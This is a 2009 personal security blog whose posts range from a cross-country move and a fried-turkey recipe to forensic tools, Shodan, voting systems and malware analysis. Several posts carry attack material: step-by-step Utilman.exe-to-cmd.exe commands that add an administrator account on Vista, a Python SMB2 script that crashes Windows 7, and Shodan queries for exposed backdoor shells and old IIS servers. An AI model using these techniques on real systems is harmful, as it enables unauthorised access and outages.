Monday, November 30, 2009

Moving Time.

Hi Folks,
today it's my last day in DC ! I very enjoined DC, the city is wonderful and the working opportunities are huge. Even the weather it's not so bad ! Tomorrow morning I'll leave at 5AM (trying to avoid DC traffic), destination Davis, CA. I'll try with the old and classic road, the Route 66. I hope my 2002 Ford Explorer will "strong enough" to cross the rocky mountains!

So basically I'll read mails every evening from 7PM to 9PM, Probably I'll not present on IM for 2 weeks and probably it will be difficult to me uploading my blog till December 15th.




Today my blog reached 280 visits per day all around the world, that's a lot for me ! So stay tuned even if you will not read much news from my blog during these two weeks.


California's Click Per Day. November 30th, 9:40 AM

To all the Californian readers, I'll back and I'll glad to meet you in somewhere in norten California, if you like that, please let a comment below, I'll contact you soon !

Saturday, November 28, 2009

YouTube Video Spam

Hi Folks,
this morning I saw these fraudulent youtube videos.


I never thought on this kind of "spam" technique. While the user is watching his favorite music video an advertisement's pop-up comes in the monitor saying: "to see more about your favorite singer click here". The user, especially during the first attacks, is tempted to click on - or copy and paste the fraudulent link which might point to whatever malicious site.

Here another example ..



If you wanna try by yourself, the youtube search words are:
Adam Lambert AMA kiss
Ortiz vs. Griffin

Friday, November 27, 2009

RunAlyzer.

Hi Folks,
as you know I'm not a Windows User, but when I find something interesting on "Windows Side" (I usually say "windows side" for W. users and "Mac side" for M. users)I wont stop me writing something about it. During these days I've been involved in a Forensic committee on some Windows machines. It was the first time that a guy showed me this amazing windows forensic tool called RunAlyzer. Its "international" web site shows that the project is pretty known in different countries (since there are a lot of different languages and testimonials) and it seems very well supported, in terms of documentation, wiki and forums.



The software is very intuitive even if explores very technical details about Windows OS. I personally found this software very useful since you can analyze and manage real time processes, explore Windows Reg's KEY, services, logs and much more. (take a close look to the follow image by clicking over it)


Thursday, November 26, 2009

Happy Thanksgiving to you



Personally I love fried turkey ! ( Thanks FoodGeeks )

INGREDIENTS

4 to 5 gallons vegetable oil
1 (12-15 lb.) whole turkey, room temperature
Cayenne pepper (optional)

INSTRUCTIONS

1. Begin heating the oil in a 10-gallon pot over a very hot propane flame outdoors. Don't set the burner to its highest setting, as you may need to increase the heat after you've added the turkey. It will take about 20 minutes for the oil to heat.

2. Meanwhile, rinse the turkey well, pat it dry inside and out, and set it on end in a sink to drain.

3. When the oil reaches 375°F, pat the turkey dry again and sprinkle it with cayenne, if desired. If your cooker has a basket insert, place the turkey in the basket and set it over a baking sheet. If not, set an oven rack over a large baking sheet, place the turkey on it and take them outside to the cooker.

4. Check the temperature of the oil. When the oil reaches 390°F, carefully and slowly lower the basket with the turkey into the oil or lower it holding it by its legs or by a long heavy tool such as a clean fireplace poker inserted into its cavity. Be careful! Immediately check the oil temperature and adjust the flame so that the temperature does not dip below 340°F. You want to maintain the temperature at 365°F. As it cooks, occasionally move the bird around in the oil so that it does not scorch (the oil near the heat source will be hotter). Whole turkeys take only 3 to 4 minutes per pound to fry to perfection. Small ones, around 12 pounds, will take about 35 minutes. Large ones, around 15 pounds, will take about 1 hour. When it is done, the turkey will float to the surface with a perfectly crispy; brown skin. If you are unsure, you can test the meat for doneness at the hip joint or insert a meat thermometer into the breast; it should register 180°F.

5. Using the basket insert if there is one or by again inserting a long heavy tool such as a clean fireplace poker into its cavity; carefully remove the turkey from the oil and hold it over the pot for a moment to allow any excess oil to drain back into the pot, then lay the bird on the oven rack. Allow it to rest for 20 minutes before carving.

Tuesday, November 24, 2009

SHODAN, The Best Computer Search Engine, Ever

Hi Folks,
this morning I discovered this amazing Computer Search Engine: SHODAN



SHODAN lets you find servers/ routers/ etc. by using the simple search bar up above. Most of the data in the index covers web servers at the moment, but there is some data on FTP, Telnet and SSH services as well. Let me know which services interest you the most and I'll prioritize them in my scanning.

Lets say you want to find servers running the 'Apache' web daemon. A simple attempt would be to use:

apache

How about finding only apache servers running version 2.2.3?

apache 2.2.3

You can also narrow down the results using the following search parameters:

country:2-letter country code
hostname:full or partial host name
net:IP range using CIDR notation (ex: 18.7.7.0/24 )
port:21, 22, 23 or 80


For example: get all web (port:80) hosts running 'apache' in switzerland (country:CH) that also have '.ch' in any of their domain names:

apache country:CH port:80 hostname:.ch

Just for the shake of hackers lets try some examples:

1) List of backdoor shell (try-it)
2) Bad Telnet Services (try-it)
3) List of old IIS 4.0, very bad... (try-it)

Now, I strongly believe in next few days a lot of systems will be compromised. With this service attackers will find vulnerable random services/servers, that is the manna for script kiddies.
One question comes out .... It will change the attack paradigm ? At the beginning of the attack's history, attackers hit the target only for particular reasons such as: politics, personal, money and so forth. Now attackers may want to attack some targets only because it's vulnerable to something, without any true reasons, only for the shake to attack something. This will be a huge paradigm shift.

Sunday, November 22, 2009

Definitely Polymorphic Malware.

Hi folks, let me say two more words about the previous code.
I strongly believe that the discussed code at the beginning of his life, followed the fastcall convention (1). As you can see, the first parameters are put directly into CPU registers, and after that saved into the stack (2),this is the classic fastcall behavior.



Due to polymorphism, the code is able to change itself. One of the first basic techniques is to change registers and saved locations like shown in (2). Basically we are in front of a polymorphic and evolved (by meaning: "not the original") malware .

Friday, November 20, 2009

The First Time Against Calling Conventions

This morning I've been fascinated by a non standard "Calling Convention" Function. Usually I play with cdecl (C calling convention), stdcall (the Microsoft standard calling convention) or from time to time I've also exploited some fastcall (fast calling convention) but I've never seen something like that:


arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
lea eax, [ebp+arg_4]
push eax ; va_list
push ecx ; char *
push esi ; size_t
push edi ; char *
call __vsnprintf
add esp, 10h
mov byte ptr [edi+esi-1], 0
pop ebp
retn

Variable in eax, ecx, esi and edi ? What's kind of convention is this?

Thursday, November 19, 2009

Top 5 Social Engineering Techniques

Hello folks,
today I just wanna share this nice article from PCWorld about the top 5 socials engineering techniques. Take a look and see if your company is vulnerable too.



Social Engineering: "There's no patch to human ingenuity ... ".

Wednesday, November 18, 2009

CAINE 1.5 released

Hi folks,
this is one of my favorite Forensic Distributions; it's called CAINE. Today is has been updated to version 1.5.



Main features:
WinTaylor 1.5, forensic frontend for Windows environment
CHANGELOG CAINE 1.5
Kernel 2.6-24.25 updated.
ADDED:
lnk_parse
lnk.sh
mork
steghide
UserAssist
dos2unix
chntpw
tkdiff
xdeview
md5deep,foremost updated
launchers fixed
manual updated
README.txt in the bash scripts directory
Photorec and Testdisk and XSteg in the Forensics menu
Window list and Show Desktop added.
------------------------------------------------
Widows Side:
Wintaylor updated
HexEdit added
Regmon updated
FTKImager updated
Index.html fixed
Photorec
Testdisk
Nigilant32
UsbWriteProtect

CAINE is one of the most intuitive Live-Distro for Forensic Analysis, I suggest it to everybody who's new to the topic. It's easy learning Forensic Analysis through this tool.

Wikipedia Toolbar CSC Vulnerability



That's interesting. I don't mean the vulnerability per se but the Wikipedia toolbar which is widely used. Here the full description.

Monday, November 16, 2009

Somewhere in Delaware



The new security paradigm or the new apple's patent prototype (camera behind monitor ) ?

Saturday, November 14, 2009

Gain Vista Administrator's Privilege

Hi Folks, today I wanna point out one of the plenty ways to gain access into Vista Boxes. Thank to some mailing list friends.
This way is clearly faster then brute forcing and boot-replacing passwords.


Boot into Backtrack and open a shell prompt:
cd /mnt (change directory to mounted drives)
ls (get the list of mounted drives)
cd sda1 (sda1 is the main hard drive)
cd Windows/ (change to the windows directory)
cd System32/ (change to the system directory)
mv Utilman.exe Utilman.old (backup original file)
cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)
reboot.
Once rebooted, at vista logon screen, Press Windows key + U
To invoke Utility Manager ( A.K.A. CMD.exe)
Cmd.exe will spawn with ‘System’ privileges.
c:\>net user S00perAdmin mypassword /add
c:\>net localgroup administrators S00perAdmin /add
Reboot and log in with your newly added Admin account

The Science News Cycle

It's so true !



Via PHD Comics

Thursday, November 12, 2009

TLS and Authentication Issues.

Yesterday, during the "Veterans Day", I spent my morning to understand the TLS attack described here



I suggest these readings to all f you, I know, it's not very "new", but it's still incredible understanding there are protocol issues yet, even if the protocol is old and well tested.

Wednesday, November 11, 2009

Windows 7: The most Secure OS ...

Directly from Microsoft TechNET

Built upon the security foundation of Windows Vista, Windows 7 introduces a number of security enhancements to give users the confidence that Microsoft is continuing to find better ways to safeguard users’ IT investments as well as data. Businesses will benefit from enhancements that help protect company sensitive information, that provide stronger protections against malware, and that help secure access to corporate resources and data. End users can enjoy the benefits of computers and the Internet knowing that Windows 7 is using new technologies and features to safeguard privacy and personal information. Finally, all users will benefit from the flexible security configuration options in Windows 7—options that will help users achieve the unique balance of security and usability to meet their specific needs.





Today Laurent Gaffie' described a very easy trick to crash the system. The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed. Basically:
netbios_header = struct.pack(">i", len(''.join(SMB_packet))+SMB_packet
(The netbios header provide the length of the incoming smb{1,2} packet)
If netbios_header is 4 bytes smaller or more than SMB_packet, it just blow !
Here the small script against the giant Microsoft Windows 7 :
import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

If you are interested on more details please visit Laurent Blog

Tuesday, November 10, 2009

Microsoft MiniFuzzer

Microsoft SDL team releases two security verification tools as FREE DOWNLOADS
BinScope Binary Analyzer integrates directly into the Visual Studio 2008 IDE. MiniFuzz File Fuzzer is a Visual Studio 2008 add-in. Both tools provide easy integration with TFS 2008 and the SDL Process Template for VSTS 2008! Both of them are available here.
MiniFuzzer File Fuzzer.
MiniFuzz is a basic testing tool designed to help detect code flaws that may expose security vulnerabilities in file-handling code. This tool creates multiple random variations of file content and feeds it to the application to exercise the code in an attempt to expose unexpected application behaviors.

Because fuzzing is effective at finding bugs, it is a required activity in the Verification Phase of the Microsoft Security Development Lifecycle (SDL). With the release of MiniFuzz, we have made a simple file fuzzer available to assist developer efforts to find and address more bugs in code before it ships to customers.
BinScope Binary Analyzer.
The BinScope Binary Analyzer is a Microsoft verification tool that analyzes binaries to ensure that they have been built in compliance with Microsoft’s Security Development Lifecycle (SDL) requirements and recommendations. BinScope checks that SDL-required compiler/linker flags are being set, strong-named assemblies are in use, and up-to-date build tools are in place.

BinScope also reports on dangerous constructs that are prohibited or discouraged by the SDL (e.g. read/write shared sections and global function pointers). For a more detailed enumeration of the checks performed by BinScope, please see the BinScope documentation. BinScope is available in two forms: as a standalone executable and as a Visual Studio add-on.

UPGRADE: Here a First impression. Take a look.

Monday, November 9, 2009

Why Prof. Chaum's Machines Don't Work in California

Maryland tested the new Verifiable Voting System designed by David Chaum and his team. I haven't see logs and comments about that so far, but I believe everything gone fine. Immediately after the news my guess was, why we don't try the system in a biggest contest like, for example California ? With respect to the current test, I believe that a wider range of people may prove a higher reliability, and much more test cases ( I know that it is a pretty new system but I also know that it has been studied for a while) to stress the system.



Since I'm living in US for (2)years, I still don't remember that each state has own laws. Thank to my friend and colleague Sean I finally understood why Scantegrity cannot be used in California.

These are the two main laws issues :
13204. (a) "All distinguishing marks or erasures are forbidden and
make the ballot void."

and

14287. "No voter shall place any mark upon a ballot that will make
that ballot identifiable."

Here the official voting codes: Voting Machine dir. (Section 13280-13289), Election Code dir. (13200-13220) and some exceptions (Section 13230-13233).

For people that don't know how scantegrity works here a nice graphical summary.



As you see in the figure above, people have to mark the ballot ("Waht Voter Leaves in the Ballot Box") and people could keep a voting proof (A: "What Voter Takes Home").

Sunday, November 8, 2009

Thnk you xkcd !

I often enjoy the xkcd comics, but this is super !



via xkcd

Friday, November 6, 2009

Maryland Tested New Electronic Voting System

From Wired.




On Tuesday voters in Takoma Park, Maryland, got to try out a new, transparent voting system that lets voters go online to verify that their ballots got counted in the final tally. The system also lets anyone independently audit election results to verify the votes went to the correct candidates.

The open source, optical-scan system, called Scantegrity, was developed by cryptographer David Chaum, with researchers from MIT, the University of Maryland - Baltimore County, George Washington University, the University of Ottawa and the University of Waterloo. It’s similar to another system, called Punchscan, that won the researchers $10,000 in 2007 at a voting machine competition sponsored by the National Science Foundation.


I'm looking forward to see the new logs !

Tuesday, November 3, 2009

iPhone Hostage. 5 Bucks for Releasing.

What happens if you forget to change your iPhone ssh password and you're using GPRS or 3G ? Of course you'll be hacked.



It appears one enterprising Dutch hacker used port scanning to identify jailbroken iPhones on T-mobile Netherlands with SSH running. Enabling SSH is a common procedure for jailbroken iPhones, allowing a user to log in via Terminal and run standard UNIX commands. Unfortunately, iPhones all have a default root password that many forget to change after jailbreaking, leaving their phone as vulnerable as a Lamborghini parked on a public street with the windows down, the doors unlocked, and the keys in the ignition.


Read more here.

ICANN Approves Non Latin Character Domains

This is absolutely true, ICANN said "Yes" to UNICODE DNS domains.



It's hard to judge, on one hand we got a more international " world wide web" :


Let's face it; millions of Internet users speak languages that aren't written using Roman characters. Allowing Web sites to have domains that use other characters will make Web addresses more recognizable to some and make the Web more accessible to millions of new users.
The transition will begin on November 16 when countries can apply for country codes in their own unique character sets.
"The first countries that participate will not only be providing valuable information of the operation of IDNs in the domain name system, they are also going to help to bring the first of billions more people online -- people who never use Roman characters in their daily lives," ICANN CEO and President Rod Beckstrom said in a statement.


But on the other hand we have some obvious security problems:



Expanding beyond Roman characters also increases potential for site rip-offs that use homoglyphs, characters with identical or indistinguishable shapes. This already occurs to some degree (for instance pointing your browser to google.com takes you to a different site than go0gle.com) but different languages might have characters that are identical to characters in other languages.



If you're interested follow the google thread here, and some more reading about that here, here and here.